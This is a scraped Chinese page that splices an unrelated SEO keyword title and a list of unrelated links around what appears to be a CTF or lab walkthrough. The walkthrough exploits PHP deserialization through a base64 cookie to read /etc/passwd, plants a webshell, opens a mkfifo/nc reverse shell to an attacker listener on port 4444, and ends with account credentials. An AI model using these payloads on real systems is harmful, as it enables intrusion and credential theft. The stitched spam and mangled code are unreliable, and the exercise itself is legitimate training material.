当前位置: 首页 > news >正文

北京网站制作团队邢台网站建设58

北京网站制作团队,邢台网站建设58,设计公司logo图标,网址怎么申请网站扫描ip,找到靶机ip后进入 他说这是cookie的测试网页#xff0c;我们抓个包#xff0c;得到cookie值 base64解码 扫描一下靶机ip的目录 发现http://192.168.88.153/backup/#xff0c;访问 下载一下发现是他的网页源码 通过代码审计#xff0c;发现 通过代码审计得知…扫描ip,找到靶机ip后进入 他说这是cookie的测试网页我们抓个包得到cookie值 base64解码 扫描一下靶机ip的目录 发现http://192.168.88.153/backup/访问 下载一下发现是他的网页源码 通过代码审计发现 通过代码审计得知首先index.php文件包含了user.class.php文件对cookie中的user参数进行了序列化和base64编码然后user.class.php文件包含了log.class.php且定义了两个类分别是Welcome和User并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log且handler函数对变量还进行了文件包含和输出。 构造payload ?phpclass Log {private $type_log /etc/passwd;}class User {private $name admin;private $wel;function __construct() {$this-wel new Log();} } $obj new User(); echo base64_encode(serialize($obj)); ? 获取到base64编码后的字节序列 抓包将编码后的数据抓包后替换 放包 查看到passwd 写一个1.txt,内容为 修改palyload为 访问99.php 在攻击模块中替换并查询ip 成功执行 开始反弹shell rm/tmp/f%3bmkfifo/tmp/f%3bcat/tmp/f|/bin/sh-i2%261|nc192.168.0.1024444/tmp/f 上述代码是特定url编码后的填入参数位置在kali里开启监听 在攻击模块发送 成功获取shell 查看文件多返回几次上级目录找到一个txt文件 查看文件  得到sk4账号密码 远程连接
http://www.w-s-a.com/news/337712/

相关文章:

  • 一个一起做网站东莞设计兼职网站建设
  • 杭州网站程序开发公司在哪个公司建设网站好
  • 网店的网站设计方案济南手机建站价格
  • 网站做了301重定向域名会自动跳转吗唐山地方志网站建设
  • 学校网站建设说明书海南省建设执业资格注册管理中心网站
  • 东莞哪家网站建设好网站风格设定
  • 自驾游网站模板搭建wordpress步骤
  • wordpress视频网站上传视频提升学历是什么意思
  • 江西省城乡建设厅建设网站浙江建设
  • 网站联系我们页面临平做网站
  • 如何用网站做cpa交互比较好的网站
  • 一家只做特卖的网站wordpress修改模板教程
  • 与恶魔做交易的网站成都到西安高铁票价
  • 太原网站制作哪家便宜长春昆仑建设股份有限公司网站
  • 优质做网站价格设计手机商城网站建设
  • 高校网站建设制度无锡网站建设排名
  • 做网站的软件wd的叫啥无锡公司网站建设服务
  • 网站建设一般需要多久网站服务器基本要素有哪些
  • 大连开发区网站开发公司免费网站建设哪个好?
  • 关于建设门户网站的通知海曙区建设局网站
  • 韩国建设部网站温州企业网站制作
  • 苏州网站建设优化贵州网站建设lonwone
  • 网站建设与推广方案模板网站建设教程搭建浊贝湖南岚鸿给力
  • 网站建设内部下单流程图昆明网站制作公司
  • 手机网站焦点图在线外链推广
  • 做静态页面的网站中国建设银行河南省分行网站
  • 镇平县两学一做专题网站佛山家居网站全网营销
  • 做网站的需求wordpress图片怎么居中
  • 网站开发的技术流程图抖音seo排名优化软件
  • dedecms做电商网站得物app官方下载安装